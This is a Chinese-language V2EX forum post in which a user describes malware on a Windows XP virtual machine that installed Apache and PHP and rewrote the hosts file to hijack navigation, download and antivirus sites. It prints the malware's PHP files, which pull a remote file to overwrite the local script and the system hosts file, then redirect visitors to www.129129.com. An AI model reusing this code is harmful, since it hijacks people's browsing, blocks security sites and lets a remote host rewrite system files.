本人有个xp虚拟机,上面没装杀毒软件。有一次不知安装了什么,桌面上总是会自动创建某网站的快捷方式,然后看进程把几个exe删掉就好了。
看进程的时候发现有个apache,我想我没装过啊,而且这个雨林木风的盗版碟也应该不自带啊。看了看apache的安装目录,也正常,不像是病毒伪装的。于是想看看是什么,浏览器输入localhost,结果跳转到了某个网站。于是想到hosts被改了,打开hosts,看到localhost是127.0.0.1,没问题啊,再往下一看,好多记录啊,常用的一些导航网站,下载网站,杀毒网站全被解析到了127.x.x.x,于是我似乎明白了什么。立马回到apache目录,发现居然还安装有php,打开htdocs,有个index.php和404.html,打开看了看,觉得这病毒作者很蛋疼啊,有必要为了劫持网站费这么多事嘛,把php和apache都给装上了,是哪个无证程序员写的啊。
贴index.php给大家看看(还自带注释的-_-||):
<?php
include_once "config.php";
$name1 = "
www.2345.com,
2345.com";
$name2 = "
www.tao123.com,
tao123.com";
//$name3 = "
www.hao123.com,
hao123.com";
//获取最新php
$index = file_get_contents('
http://www.129129.com/ht/index.txt'); if(strpos($index, '@')!==false)
{
$arr = explode("@", $index);
$index = $arr[1];
$hosts = $arr[0];
$index = get_rep($index);
if(!empty($index)){
if(file_put_contents("index.php", $index)==0){}
}
//获取最新hosts
if(!empty($hosts)){
if(file_put_contents("C:/WINDOWS/system32/drivers/etc/hosts", $hosts)==0){}
}
}
//域名跳转个性化
$serverName = $_SERVER['SERVER_NAME'];
switch ($serverName) {
case strpos($name1,$serverName)!==false:
header("Location:
http://www.129129.com/?1");exit;
break;
case strpos($name2,$serverName)!==false:
header("Location:
http://www.129129.com/?2");exit;
break;
case strpos($name3,$serverName)!==false:
header("Location:
http://www.129129.com/?3");exit;
break;
default:
header("Location:
http://www.129129.com/?4");exit;
break;
}
?>
<meta http-equiv="refresh" content="0;url=
http://www.129129.com/?301">
config.php:
<?php
function get_rep($index)
{
return str_replace('explode("%", $index)', 'explode("@", $index)', $index);
}
?>
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
https://www.v2ex.com/t/90587
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.